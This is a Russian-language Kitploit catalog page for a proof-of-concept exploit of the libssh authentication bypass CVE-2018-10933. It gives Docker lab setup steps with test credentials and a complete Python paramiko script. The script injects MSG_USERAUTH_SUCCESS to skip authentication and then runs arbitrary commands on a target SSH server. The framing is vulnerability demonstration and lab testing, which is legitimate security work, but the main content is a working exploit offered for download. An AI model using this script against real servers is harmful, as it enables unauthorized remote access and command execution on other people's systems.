Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Libssh-server-CVE-2018-10933 — Эксплойт для подтверждения концепции для CVE-2018-10933, демонстрирующий обход аутентификации SSH через инъекцию MSG_USERAUTH_SUCCESS. Включает настройку Docker и Python-скрипт для удаленного выполнения команд. | Kitploit
Инструменты/GitHubGitHub/cyberharsh/libssh-server-cve-2018-10933
Анализ уязвимостейЭксплуатацияСетевая безопасностьТестирование на ПроникновениеАутентификацияЭксплуатация Бинарных Файлов
GitHubcyberharsh/libssh-server-cve-2018-10933

Libssh-server-CVE-2018-10933

Эксплойт для подтверждения концепции для CVE-2018-10933, демонстрирующий обход аутентификации SSH через инъекцию MSG_USERAUTH_SUCCESS. Включает настройку Docker и Python-скрипт для удаленного выполнения команд.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
6 лет назадЕщё не проверено

Уязвимость обхода аутентификации в libssh (CVE-2018-10933)

中文版本(Chinese version)

libssh — это многоплатформенная библиотека на C, реализующая протокол SSHv2 на стороне клиента и сервера. Логическая уязвимость была обнаружена в серверной конечной машине состояний libssh. Злоумышленник может отправить сообщение MSG_USERAUTH_SUCCESS до завершения аутентификации. Это позволяет обойти аутентификацию и получить доступ к целевому SSH-серверу.

Ссылки:

  • https://www.libssh.org/security/advisories/CVE-2018-10933.txt
  • https://www.seebug.org/vuldb/ssvid-97614

Настройка

Запуск окружения:

root@kitploit:~
docker-compose up -d

После запуска окружения мы можем подключиться к порту your-ip:2222 (учётные данные: myuser:mypassword), это легальный вход по SSH:

Эксплуатация

Ссылаясь на PoC, приведённый в https://www.seebug.org/vuldb/ssvid-97614, мы можем использовать следующий скрипт для подтверждения уязвимости.

root@kitploit:~
#!/usr/bin/env python3
import sys
import paramiko
import socket
import logging

logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
bufsize = 2048


def execute(hostname, port, command):
    sock = socket.socket()
    try:
        sock.connect((hostname, int(port)))

        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()

        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)

        client = transport.open_session(timeout=10)
        client.exec_command(command)

        # stdin = client.makefile("wb", bufsize)
        stdout = client.makefile("rb", bufsize)
        stderr = client.makefile_stderr("rb", bufsize)

        output = stdout.read()
        error = stderr.read()

        stdout.close()
        stderr.close()

        return (output+error).decode()
    except paramiko.SSHException as e:
        logging.exception(e)
        logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
    except socket.error:
        logging.debug("Unable to connect.")

    return None


if __name__ == '__main__':
    print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))

Вы можете выполнять произвольные команды на целевом сервере следующим образом:

Скачать инструмент